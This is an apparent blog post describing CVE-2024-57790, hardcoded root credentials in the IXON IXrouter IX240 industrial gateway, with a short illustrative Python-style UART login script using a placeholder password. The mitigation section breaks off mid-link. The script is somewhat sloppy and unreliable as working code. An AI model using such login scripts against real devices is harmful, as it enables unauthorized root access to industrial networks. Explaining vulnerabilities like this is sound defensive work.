CVE-2024-57790: IXON B.V. IXrouter IX240 Hardcoded Root Credentials Vulnerability - Unauthorized Access and Exploitation Risks

Recently, a critical vulnerability was discovered in the IXON B.V. IXrouter IX240 (Industrial Edge Gateway) v3., which contains hardcoded root credentials stored in the non-volatile flash memory. This vulnerability with the identifier CVE-2024-57790 poses a significant security risk that enables physically proximate attackers to gain unauthorized root access via UART (Universal Asynchronous Receiver/Transmitter) or SSH (Secure Shell) connections. This blog post delves further into this vulnerability, demonstrating the risks it poses to affected systems through code snippets, original references, and exploit details.

Background

The IXrouter is an industrial edge gateway designed by IXON B.V. for IoT (Internet of Things) applications as a means of securely connecting devices to the cloud for data transfer, remote monitoring, and control. Organizations across various sectors such as manufacturing, healthcare, and energy rely on these devices for secure and reliable communication between their industrial equipment and networks. Therefore, any security vulnerabilities pose serious risks to the confidentiality, integrity, and availability of the data they transmit.

Vulnerability Details

The vulnerability lies in the IXrouter device's firmware, which contains hardcoded root credentials stored in the non-volatile flash memory. An attacker with physical access to the device can exploit these credentials to gain root access via UART or SSH. The following code snippet provides an example of the malicious actor using a UART connection to gain root access:

uart_connect:

serial_port = "/dev/ttyUSB"
baud_rate = 115200

serial_conn = serial.Serial(serial_port, baud_rate)
serial_conn.write(b'\r\n')

# Sending root login credentials
serial_conn.write(b'root\r\n')
serial_conn.write(b'hardcoded_password_here\r\n')

# Verify access and escalate privileges
serial_conn.write(b'id\r\n')

while True:
    response = serial_conn.readline()
    if b"uid=(root)" in response:
        print("Root access granted!")
        break

The attacker can then use this access to modify configurations, exfiltrate sensitive information, or execute further attacks on the target network. This poses a significant risk to the organization's operational security and the data being processed or transmitted through the affected device.

Mitigation and Recommendations

IXON B.V. has released a [security advisory](https://www.ixon.cloud/media/security-advisories/ixon-notice-ixon

Timeline

Published on: 02/14/2025 17:15:18 UTC
Last modified on: 03/17/2025 19:15:24 UTC